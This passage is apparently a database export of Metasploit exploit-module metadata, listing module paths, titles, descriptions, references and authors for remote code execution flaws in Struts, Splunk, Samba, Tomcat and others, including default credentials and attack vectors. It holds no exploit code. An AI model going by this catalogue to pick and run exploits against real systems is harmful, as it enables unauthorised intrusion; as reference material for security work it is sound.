00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/snortreport_exec.rb","exploit","multi/http/snortreport_exec","exploit/multi/http/snortreport_exec","Snortreport nmap.php/nbtscan.php Remote Command Execution",600,"This module exploits an arbitrary command execution vulnerability in nmap.php and nbtscan.php scripts.","Metasploit Framework License (BSD)","f","2011-09-19 00:00:00",0,,"aggressive","t","OSVDB-67739, URL-http://www.symmetrixtech.com/articles/news-016.html","Paul Rascagneres" 162,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/sonicwall_gms_upload.rb","exploit","multi/http/sonicwall_gms_upload","exploit/multi/http/sonicwall_gms_upload","SonicWALL GMS 6 Arbitrary File Upload",600,"This module exploits a code execution flaw in SonicWALL GMS. It exploits two vulnerabilities in order to get its objective. An authentication bypass in the Web Administration interface allows to abuse the ""appliance"" application and upload an arbitrary payload embedded in a JSP. The module has been tested successfully on SonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual Appliance (Linux). On the Virtual Appliance the linux meterpreter hasn't run successfully while testing, shell payload have been used.","Metasploit Framework License (BSD)","t","2012-01-17 00:00:00",0,,"aggressive","t","BID-57445, CVE-2013-1359, EDB-24204, OSVDB-89347","Julian Vilas , Nikolas Sotiriu, juan vazquez " 163,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/splunk_mappy_exec.rb","exploit","multi/http/splunk_mappy_exec","exploit/multi/http/splunk_mappy_exec","Splunk Search Remote Code Execution",600,"This module abuses a command execution vulnerability in the web based interface of Splunk 4.2 to 4.2.4. The vulnerability exists in the 'mappy' search command which allows attackers to run Python code. To exploit this vulnerability, a valid Splunk user with the admin role is required. By default, this module uses the credential of ""admin:changeme"", the default Administrator credential for Splunk. Note that the Splunk web interface runs as SYSTEM on Windows and as root on Linux by default.","Metasploit Framework License (BSD)","f","2011-12-12 00:00:00",0,,"aggressive","t","BID-51061, CVE-2011-4642, OSVDB-77695, URL-http://www.sec-1.com/blog/?p=233, URL-http://www.sec-1.com/blog/wp-content/uploads/2011/12/Attacking_Splunk_Release.pdf, URL-http://www.sec-1.com/blog/wp-content/uploads/2011/12/splunkexploit.zip, URL-http://www.splunk.com/view/SP-CAAAGMM","Gary O'Leary-Steele, juan vazquez " 164,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/splunk_upload_app_exec.rb","exploit","multi/http/splunk_upload_app_exec","exploit/multi/http/splunk_upload_app_exec","Splunk 5.0 Custom App Remote Code Execution",400,"This module exploits a feature of Splunk whereby a custom application can be uploaded through the web based interface. Through the 'script' search command a user can call commands defined in their custom application which includes arbitrary perl or python code. To abuse this behavior, a valid Splunk user with the admin role is required. By default, this module uses the credential of ""admin:changeme"", the default Administrator credential for Splunk. Note that the Splunk web interface runs as SYSTEM on Windows, or as root on Linux by default. This module has only been tested successfully against Splunk 5.0.","Metasploit Framework License (BSD)","f","2012-09-27 00:00:00",,,"aggressive","t","URL-http://blog.7elements.co.uk/2012/11/abusing-splunk-with-metasploit.html, URL-http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html, URL-http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Script","juan vazquez , marcwickenden, sinn3r " 165,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/spree_search_exec.rb","exploit","multi/http/spree_search_exec","exploit/multi/http/spree_search_exec","Spreecommerce 0.60.1 Arbitrary Command Execution",600,"This module exploits an arbitrary command execution vulnerability in the Spreecommerce search. Unvalidated input is called via the Ruby send method allowing command execution.","Metasploit Framework License (BSD)","f","2011-10-05 00:00:00",0,,"aggressive","t","OSVDB-76011, URL-http://spreecommerce.com/blog/2011/10/05/remote-command-product-group/","joernchen " 166,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/spree_searchlogic_exec.rb","exploit","multi/http/spree_searchlogic_exec","exploit/multi/http/spree_searchlogic_exec","Spreecommerce < 0.50.0 Arbitrary Command Execution",600,"This module exploits an arbitrary command execution vulnerability in the Spreecommerce API searchlogic. Unvalidated input is called via the Ruby send method allowing command execution.","Metasploit Framework License (BSD)","f","2011-04-19 00:00:00",0,,"aggressive","t","OSVDB-71900, URL-http://www.spreecommerce.com/blog/2011/04/19/security-fixes/","joernchen " 167,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/struts_code_exec.rb","exploit","multi/http/struts_code_exec","exploit/multi/http/struts_code_exec","Apache Struts < 2.2.0 Remote Command Execution",400,"This module exploits a remote command execution vulnerability in Apache Struts versions < 2.2.0. This issue is caused by a failure to properly handle unicode characters in OGNL extensive expressions passed to the web server. By sending a specially crafted request to the Struts application it is possible to bypass the ""#"" restriction on ParameterInterceptors by using OGNL context variables. Bypassing this restriction allows for the execution of arbitrary Java code.","Metasploit Framework License (BSD)","t","2010-07-13 00:00:00",0,,"aggressive","t","CVE-2010-1870, EDB-14360, OSVDB-66280","Meder Kydyraliev, bannedit " 168,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb","exploit","multi/http/struts_code_exec_exception_delegator","exploit/multi/http/struts_code_exec_exception_delegator","Apache Struts <= 2.2.1.1 Remote Command Execution",600,"This module exploits a remote command execution vulnerability in Apache Struts versions < 2.2.1.1. This issue is caused because the ExceptionDelegator interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.","Metasploit Framework License (BSD)","t","2012-01-06 00:00:00",2,,"aggressive","t","CVE-2012-0391, EDB-18329, OSVDB-78277, URL-https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt","Andreas Nusser, Johannes Dahse, juan vazquez , mihi, sinn3r " 169,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/struts_code_exec_parameters.rb","exploit","multi/http/struts_code_exec_parameters","exploit/multi/http/struts_code_exec_parameters","Apache Struts ParametersInterceptor Remote Code Execution",600,"This module exploits a remote command execution vulnerability in Apache Struts versions < 2.3.1.2. This issue is caused because the ParametersInterceptor allows for the use of parentheses which in turn allows it to interpret parameter values as OGNL expressions during certain exception handling for mismatched data types of properties which allows remote attackers to execute arbitrary Java code via a crafted parameter.","Metasploit Framework License (BSD)","t","2011-10-01 00:00:00",2,,"aggressive","t","CVE-2011-3923, OSVDB-78501, URL-http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html, URL-https://cwiki.apache.org/confluence/display/WW/S2-009","Meder Kydyraliev, Richard Hicks , mihi" 170,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/stunshell_eval.rb","exploit","multi/http/stunshell_eval","exploit/multi/http/stunshell_eval","STUNSHELL Web Shell Remote PHP Code Execution",500,"This module exploits unauthenticated versions of the ""STUNSHELL"" web shell. This module works when safe mode is enabled on the web server. This shell is widely used in automated RFI payloads.","Metasploit Framework License (BSD)","f","2013-03-23 00:00:00",0,,"aggressive","t","URL-https://defense.ballastsecurity.net/decoding/index.php?hash=a4cd8ba05eb6ba7fb86dd66bed968007, URL-https://defense.ballastsecurity.net/wiki/index.php/STUNSHELL","bwall " 171,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/stunshell_exec.rb","exploit","multi/http/stunshell_exec","exploit/multi/http/stunshell_exec","STUNSHELL Web Shell Remote Code Execution",500,"This module exploits unauthenticated versions of the ""STUNSHELL"" web shell. This module works when safe mode is disabled on the web server. This shell is widely used in automated RFI payloads.","Metasploit Framework License (BSD)","f","2013-03-23 00:00:00",0,,"aggressive","t","URL-https://defense.ballastsecurity.net/decoding/index.php?hash=a4cd8ba05eb6ba7fb86dd66bed968007, URL-https://defense.ballastsecurity.net/wiki/index.php/STUNSHELL","bwall " 172,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/sun_jsws_dav_options.rb","exploit","multi/http/sun_jsws_dav_options","exploit/multi/http/sun_jsws_dav_options","Sun Java System Web Server WebDAV OPTIONS Buffer Overflow",500,"This module exploits a buffer overflow in Sun Java Web Server prior to version 7 Update 8. By sending an ""OPTIONS"" request with an overly long path, attackers can execute arbitrary code. In order to reach the vulnerable code, the attacker must also specify the path to a directory with WebDAV enabled. This exploit was tested and confirmed to work on Windows XP SP3 without DEP. Versions for other platforms are vulnerable as well. The vulnerability was originally discovered and disclosed by Evgeny Legerov of Intevydis.","Metasploit Framework License (BSD)","t","2010-01-20 00:00:00",0,,"aggressive","t","CVE-2010-0361, OSVDB-61851, URL-http://intevydis.blogspot.com/2010/01/sun-java-system-web-server-70u7-webdav.html, URL-http://sunsolve.sun.com/search/document.do?assetkey=1-66-275850-1","jduck " 173,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/testlink_upload_exec.rb","exploit","multi/http/testlink_upload_exec","exploit/multi/http/testlink_upload_exec","TestLink v1.9.3 Arbitrary File Upload Vulnerability",600,"This module exploits a vulnerability in TestLink version 1.9.3 or prior. This application has an upload feature that allows any authenticated user to upload arbitrary files to the '/upload_area/nodes_hierarchy/' directory with a randomized file name. The file name can be retrieved from the database using SQL injection.","Metasploit Framework License (BSD)","f","2012-08-13 00:00:00",0,,"aggressive","t","URL-http://itsecuritysolutions.org/2012-08-13-TestLink-1.9.3-multiple-vulnerabilities/","Brendan Coles " 174,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/tomcat_mgr_deploy.rb","exploit","multi/http/tomcat_mgr_deploy","exploit/multi/http/tomcat_mgr_deploy","Apache Tomcat Manager Application Deployer Authenticated Code Execution",600,"This module can be used to execute a payload on Apache Tomcat servers that have an exposed ""manager"" application. The payload is uploaded as a WAR archive containing a jsp application using a PUT request. The manager application can also be abused using /manager/html/upload, but that method is not implemented in this module. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.","Metasploit Framework License (BSD)","f","2009-11-09 00:00:00",0,,"aggressive","t","BID-36954, BID-38084, CVE-2009-3548, CVE-2009-3843, CVE-2009-4188, CVE-2009-4189, CVE-2010-0557, CVE-2010-4094, OSVDB-60176, OSVDB-60317, OSVDB-60670, URL-http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html, URL-http://www-01.ibm.com/support/docview.wss?uid=swg21419179, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-214/","jduck " 175,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/traq_plugin_exec.rb","exploit","multi/http/traq_plugin_exec","exploit/multi/http/traq_plugin_exec","Traq admincp/common.php Remote Code Execution",600,"This module exploits an arbitrary command execution vulnerability in Traq 2.0 to 2.3. It's in the admincp/common.php script. This function is called in each script located into /admicp/ directory to make sure the user has admin rights, but this is a broken authorization schema due to the header() function doesn't stop the execution flow. This can be exploited by malicious users to execute admin functionality resulting for e.g. in execution of arbitrary PHP code leveraging of plugins.php functionality.","Metasploit Framework License (BSD)","f","2011-12-12 00:00:00",0,,"aggressive","t","EDB-18213, OSVDB-77556, URL-http://traqproject.org/","EgiX, TecR0c " 176,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/v0pcr3w_exec.rb","exploit","multi/http/v0pcr3w_exec","exploit/multi/http/v0pcr3w_exec","v0pCr3w Web Shell Remote Code Execution",500,"This module exploits a lack of authentication in the shell developed by v0pCr3w and is widely reused in automated RFI payloads. This module takes advantage of the shell's various methods to execute commands.","Metasploit Framework License (BSD)","f","2013-03-23 00:00:00",0,,"aggressive","t","URL-https://defense.ballastsecurity.net/decoding/index.php?hash=f6b534edf37c3cc0aa88997810daf9c0, URL-https://defense.ballastsecurity.net/wiki/index.php/V0pCr3w_shell","bwall " 177,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/vbseo_proc_deutf.rb","exploit","multi/http/vbseo_proc_deutf","exploit/multi/http/vbseo_proc_deutf","vBSEO <= 3.6.0 proc_deutf() Remote PHP Code Injection",600,"This module exploits a vulnerability in the 'proc_deutf()' function defined in /includes/functions_vbseocp_abstract.php. User input passed through 'char_repl' POST parameter isn't properly sanitized before being used in a call to preg_replace() function which uses the 'e' modifier. This can be exploited to inject and execute arbitrary code leveraging the PHP's complex curly syntax.","Metasploit Framework License (BSD)","f","2012-01-23 00:00:00",0,,"aggressive","t","BID-51647, EDB-18424, OSVDB-78508, URL-http://www.vbseo.com/f5/vbseo-security-bulletin-all-supported-versions-patch-release-52783/","EgiX " 178,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/webpagetest_upload_exec.rb","exploit","multi/http/webpagetest_upload_exec","exploit/multi/http/webpagetest_upload_exec","WebPageTest Arbitrary PHP File Upload",600,"This module exploits a vulnerability found in WebPageTest's Upload Feature. By default, the resultimage.php file does not verify the user-supplied item before saving it to disk, and then places this item in the web directory accessable by remote users. This flaw can be abused to gain remote code execution.","Metasploit Framework License (BSD)","f","2012-07-13 00:00:00",0,,"aggressive","t","EDB-19790, OSVDB-83822","dun, sinn3r " 179,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/wikka_spam_exec.rb","exploit","multi/http/wikka_spam_exec","exploit/multi/http/wikka_spam_exec","WikkaWiki 1.3.2 Spam Logging PHP Injection",600,"This module exploits a vulnerability found in WikkaWiki. When the spam logging feature is enabled, it is possible to inject PHP code into the spam log file via the UserAgent header , and then request it to execute our payload. There are at least three different ways to trigger spam protection, this module does so by generating 10 fake URLs in a comment (by default, the max_new_comment_urls parameter is 6). Please note that in order to use the injection, you must manually pick a page first that allows you to add a comment, and then set it as 'PAGE'.","Metasploit Framework License (BSD)","f","2011-11-30 00:00:00",0,,"aggressive","t","CVE-2011-4451, EDB-18177, OSVDB-77393, URL-http://wush.net/trac/wikka/ticket/1098","EgiX, sinn3r " 180,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/http/zenworks_control_center_upload.rb","exploit","multi/http/zenworks_control_center_upload","exploit/multi/http/zenworks_control_center_upload","Novell ZENworks Configuration Management Remote Execution",500,"This module exploits a code execution flaw in Novell ZENworks Configuration Management 10 SP3 and 11 SP2. The vulnerability exists in the ZEnworks Control Center application, allowing an unauthenticated attacker to upload a malicious file outside of the TEMP directory and then make a second request that allows for arbitrary code execution. This module has been tested successfully on Novell ZENworks Configuration Management 10 SP3 and 11 SP2 on Windows 2003 SP2 and SUSE Linux Enterprise Server 10 SP3.","Metasploit Framework License (BSD)","f","2013-03-22 00:00:00",1,,"aggressive","t","BID-58668, CVE-2013-1080, OSVDB-91627, URL-http://www.novell.com/support/kb/doc.php?id=7011812, URL-http://www.zerodayinitiative.com/advisories/ZDI-13-049/","James Burton, juan vazquez " 181,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/ids/snort_dce_rpc.rb","exploit","multi/ids/snort_dce_rpc","exploit/multi/ids/snort_dce_rpc","Snort 2 DCE/RPC preprocessor Buffer Overflow",400,"This module allows remote attackers to execute arbitrary code by exploiting the Snort service via crafted SMB traffic. The vulnerability is due to a boundary error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests, which may result a stack-based buffer overflow with a specially crafted packet sent on a network that is monitored by Snort. Vulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6. Any host on the Snort network may be used as the remote host. The remote host does not need to be running the SMB service for the exploit to be successful.","Metasploit Framework License (BSD)","t","2007-02-19 00:00:00",0,,"aggressive","t","CVE-2006-5276, OSVDB-32094, URL-http://downloads.securityfocus.com/vulnerabilities/exploits/22616-linux.py, URL-http://sf-freedom.blogspot.com/2007/02/snort-261-dcerpc-preprocessor-remote.html, URL-http://web.archive.org/web/20070221235015/http://www.snort.org/docs/advisory-2007-02-19.html","0a29406d9794e4f9b30b3c5d6702c708, Carsten Maartmann-Moe , Neel Mehta, Trirat Puttaraksa" 182,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/misc/batik_svg_java.rb","exploit","multi/misc/batik_svg_java","exploit/multi/misc/batik_svg_java","Squiggle 1.7 SVG Browser Java Code Execution",600,"This module abuses the SVG support to execute Java Code in the Squiggle Browser included in the Batik framework 1.7 through a crafted SVG file referencing a jar file. In order to gain arbitrary code execution, the browser must meet the following conditions: (1) It must support at least SVG version 1.1 or newer, (2) It must support Java code and (3) The ""Enforce secure scripting"" check must be disabled. The module has been tested against Windows and Linux platforms.","Metasploit Framework License (BSD)","f","2012-05-11 00:00:00",0,,"passive","t","OSVDB-81965, URL-http://www.agarri.fr/blog/","Nicolas Gregoire, juan vazquez , sinn3r " 183,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/misc/hp_vsa_exec.rb","exploit","multi/misc/hp_vsa_exec","exploit/multi/misc/hp_vsa_exec","HP StorageWorks P4000 Virtual SAN Appliance Command Execution",600,"This module exploits a vulnerability found in HP's StorageWorks P4000 VSA on versions prior to 9.5. By using a default account credential, it is possible to inject arbitrary commands as part of a ping request via port 13838.","Metasploit Framework License (BSD)","t","2011-11-11 00:00:00",0,,"aggressive","t","EDB-18893, URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03082086, URL-http://www.agarri.fr/blog/archives/2012/02/index.html, URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?loc=en_US&id=958","Nicolas Gregoire, sinn3r " 184,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/misc/indesign_server_soap.rb","exploit","multi/misc/indesign_server_soap","exploit/multi/misc/indesign_server_soap","Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution",600,"This module abuses the ""RunScript"" procedure provided by the SOAP interface of Adobe InDesign Server, to execute abritary vbscript (Windows) or applescript(OSX). The exploit drops the payload on the server and must be removed manually.","Metasploit Framework License (BSD)","f","2012-11-11 00:00:00",0,,"aggressive","t","OSVDB-87548, URL-http://secunia.com/advisories/48572/","h0ng10, juan vazquez " 185,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/misc/java_rmi_server.rb","exploit","multi/misc/java_rmi_server","exploit/multi/misc/java_rmi_server","Java RMI Server Insecure Default Configuration Java Code Execution",600,"This module takes advantage of the default configuration of the RMI Registry and RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it invokes a method in the RMI Distributed Garbage Collector which is available via every RMI endpoint, it can be used against both rmiregistry and rmid, and against most other (custom) RMI endpoints as well. Note that it does not work against Java Management Extension (JMX) ports since those do not support remote class loading, unless another RMI endpoint is active in the same Java process. RMI method calls do not support or require any sort of authentication.","Metasploit Framework License (BSD)","t","2011-10-15 00:00:00",0,,"aggressive","t","MSF-java_rmi_server, URL-http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html","mihi" 186,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/misc/openview_omniback_exec.rb","exploit","multi/misc/openview_omniback_exec","exploit/multi/misc/openview_omniback_exec","HP OpenView OmniBack II Command Execution",600,"This module uses a vulnerability in the OpenView Omniback II service to execute arbitrary commands. This vulnerability was discovered by DiGiT and his code was used as the basis for this module. For Microsoft Windows targets, due to module limitations, use the ""unix/cmd/generic"" payload and set CMD to your command. You can only pass a small amount of characters (4) to the command line on Windows.","Metasploit Framework License (BSD)","f","2001-02-28 00:00:00",0,,"aggressive","t","BID-11032, CVE-2001-0311, OSVDB-6018, URL-http://www.securiteam.com/exploits/6M00O150KG.html","hdm , patrick " 187,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/misc/pbot_exec.rb","exploit","multi/misc/pbot_exec","exploit/multi/misc/pbot_exec","PHP IRC Bot pbot eval() Remote Code Execution",600,"This module allows remote command execution on the PHP IRC bot pbot by abusing the usage of eval() in the implementation of the .php command. In order to work, the data to connect to the IRC server and channel where find pbot must be provided. The module has been successfully tested on the version of pbot analyzed by Jay Turla, and published on Infosec Institute, running over Ubuntu 10.04 and Windows XP SP3.","Metasploit Framework License (BSD)","f","2009-11-02 00:00:00",0,,"aggressive","t","EDB-20168, URL-http://offensivecomputing.net/?q=node/1417, URL-http://resources.infosecinstitute.com/pbot-analysis/","Jay Turla, bwall, evilcry, juan vazquez " 188,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb","exploit","multi/misc/ra1nx_pubcall_exec","exploit/multi/misc/ra1nx_pubcall_exec","Ra1NX PHP Bot PubCall Authentication Bypass Remote Code Execution",500,"This module allows remote command execution on the PHP IRC bot Ra1NX by using the public call feature in private message to covertly bypass the authentication system.","Metasploit Framework License (BSD)","f","2013-03-24 00:00:00",0,,"aggressive","t","OSVDB-91663, URL-http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b, URL-https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0, URL-https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot","bwall " 189,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb","exploit","multi/misc/veritas_netbackup_cmdexec","exploit/multi/misc/veritas_netbackup_cmdexec","VERITAS NetBackup Remote Command Execution",600,"This module allows arbitrary command execution on an ephemeral port opened by Veritas NetBackup, whilst an administrator is authenticated. The port is opened and allows direct console access as root or SYSTEM from any source address.","Metasploit Framework License (BSD)","t","2004-10-21 00:00:00",0,,"aggressive","t","BID-11494, CVE-2004-1389, OSVDB-11026, URL-http://seer.support.veritas.com/docs/271727.htm","patrick " 190,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb","exploit","multi/misc/wireshark_lwres_getaddrbyname","exploit/multi/misc/wireshark_lwres_getaddrbyname","Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow",500,"The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer overflow. This bug found and reported by babi. This particular exploit targets the dissect_getaddrsbyname_request function. Several other functions also contain potentially exploitable stack-based buffer overflows. The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents exploitation via the return address on the stack. Sending a larger string allows exploitation using the SEH bypass method. However, this packet will usually get fragmented, which may cause additional complications. NOTE: The vulnerable code is reached only when the packet dissection is rendered. If the packet is fragmented, all fragments must be captured and reassembled to exploit this issue.","Metasploit Framework License (BSD)","t","2010-01-27 00:00:00",,,"aggressive","t","BID-37985, CVE-2010-0304, OSVDB-61987, URL-http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=h, URL-http://www.wireshark.org/security/wnpa-sec-2010-02.html","babi, jduck , redsand" 191,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb","exploit","multi/misc/wireshark_lwres_getaddrbyname_loop","exploit/multi/misc/wireshark_lwres_getaddrbyname_loop","Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)",500,"The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer overflow. This bug found and reported by babi. This particular exploit targets the dissect_getaddrsbyname_request function. Several other functions also contain potentially exploitable stack-based buffer overflows. The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents exploitation via the return address on the stack. Sending a larger string allows exploitation using the SEH bypass method. However, this packet will usually get fragmented, which may cause additional complications. NOTE: The vulnerable code is reached only when the packet dissection is rendered. If the packet is fragmented, all fragments must be captured and reassembled to exploit this issue. This version loops, sending the packet every X seconds until the job is killed.","Metasploit Framework License (BSD)","t","2010-01-27 00:00:00",4,,"passive","t","BID-37985, CVE-2010-0304, OSVDB-61987, URL-http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=h, URL-http://www.wireshark.org/security/wnpa-sec-2010-02.html","babi, jduck , redsand" 192,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/misc/zend_java_bridge.rb","exploit","multi/misc/zend_java_bridge","exploit/multi/misc/zend_java_bridge","Zend Server Java Bridge Arbitrary Java Code Execution",500,"This module takes advantage of a trust relationship issue within the Zend Server Java Bridge. The Java Bridge is responsible for handling interactions between PHP and Java code within Zend Server. When Java code is encountered Zend Server communicates with the Java Bridge. The Java Bridge then handles the java code and creates the objects within the Java Virtual Machine. This interaction however, does not require any sort of authentication. This leaves the JVM wide open to remote attackers. Sending specially crafted data to the Java Bridge results in the execution of arbitrary java code.","Metasploit Framework License (BSD)","t","2011-03-28 00:00:00",0,,"passive","t","EDB-17078, OSVDB-71420, URL-http://www.zerodayinitiative.com/advisories/ZDI-11-113/","bannedit " 193,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/ntp/ntp_overflow.rb","exploit","multi/ntp/ntp_overflow","exploit/multi/ntp/ntp_overflow","NTP daemon readvar Buffer Overflow",400,"This module exploits a stack based buffer overflow in the ntpd and xntpd service. By sending an overly long 'readvar' request it is possible to execute code remotely. As the stack is corrupted, this module uses the Egghunter technique.","Metasploit Framework License (BSD)","t","2001-04-04 00:00:00",0,,"aggressive","t","BID-2540, CVE-2001-0414, OSVDB-805, US-CERT-VU-970472","patrick " 194,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/php/php_unserialize_zval_cookie.rb","exploit","multi/php/php_unserialize_zval_cookie","exploit/multi/php/php_unserialize_zval_cookie","PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)",200,"This module exploits an integer overflow vulnerability in the unserialize() function of the PHP web server extension. This vulnerability was patched by Stefan in version 4.5.0 and applies all previous versions supporting this function. This particular module targets numerous web applications and is based on the proof of concept provided by Stefan Esser. This vulnerability requires approximately 900k of data to trigger due the multiple Cookie headers requirement. Since we are already assuming a fast network connection, we use a 2Mb block of shellcode for the brute force, allowing quick exploitation for those with fast networks. One of the neat things about this vulnerability is that on x86 systems, the EDI register points into the beginning of the hashtable string. This can be used with an egghunter to quickly exploit systems where the location of a valid ""jmp EDI"" or ""call EDI"" instruction is known. The EDI method is faster, but the bandwidth-intensive brute force used by this module is more reliable across a wider range of systems.","Metasploit Framework License (BSD)","f","2007-03-04 00:00:00",,,"aggressive","t","CVE-2007-1286, OSVDB-32771, URL-http://www.php-security.org/MOPB/MOPB-04-2007.html","GML , Stefan Esser , hdm " 195,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/realserver/describe.rb","exploit","multi/realserver/describe","exploit/multi/realserver/describe","RealServer Describe Buffer Overflow",500,"This module exploits a buffer overflow in RealServer 7/8/9 and was based on Johnny Cyberpunk's THCrealbad exploit. This code should reliably exploit Linux, BSD, and Windows-based servers.","Metasploit Framework License (BSD)","t","2002-12-20 00:00:00",0,,"aggressive","t","CVE-2002-1643, OSVDB-4468, URL-http://lists.immunitysec.com/pipermail/dailydave/2003-August/000030.html","hdm " 196,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/samba/nttrans.rb","exploit","multi/samba/nttrans","exploit/multi/samba/nttrans","Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow",200,"This module attempts to exploit a buffer overflow vulnerability present in versions 2.2.2 through 2.2.6 of Samba. The Samba developers report this as: ""Bug in the length checking for encrypted password change requests from clients."" The bug was discovered and reported by the Debian Samba Maintainers.","Metasploit Framework License (BSD)","t","2003-04-07 00:00:00",,,"aggressive","t","BID-6210, CVE-2002-1318, OSVDB-14525, URL-http://www.samba.org/samba/history/samba-2.2.7a.html","hdm " 197,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/samba/usermap_script.rb","exploit","multi/samba/usermap_script","exploit/multi/samba/usermap_script","Samba ""username map script"" Command Execution",600,"This module exploits a command execution vulerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default ""username map script"" configuration option. By specifying a username containing shell meta characters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication!","Metasploit Framework License (BSD)","t","2007-05-14 00:00:00",0,,"aggressive","t","BID-23972, CVE-2007-2447, OSVDB-34700, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534, URL-http://samba.org/samba/security/CVE-2007-2447.html","jduck " 198,"2013-05-14 23:14:14","/opt/metasploit/apps/pro/msf3/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb","exploit","multi/sap/sap_mgmt_con_osexec_payload","exploit/multi/sap/sap_mgmt_con_osexec_payload","SAP Management Console OSExecute Payload Execution",600,"This module executes an arbitrary payload through the SAP Management Console SOAP Interface. A valid username and password for the SAP Management Console must be provided. This module has been tested successfully on both Windows and Linux platforms running SAP Netweaver. In order to exploit a Linux platform, the target system must have available the wget command.","Metasploit Framework License (BSD)","f","2011-03-08 00:00:00",0,,"passive","t","URL-http://blog.c22.cc/toolsscripts/metasploit-modules/sap_mgmt_con_osexecute/","Chris John Riley, juan vazquez " 199,"2013-05-13 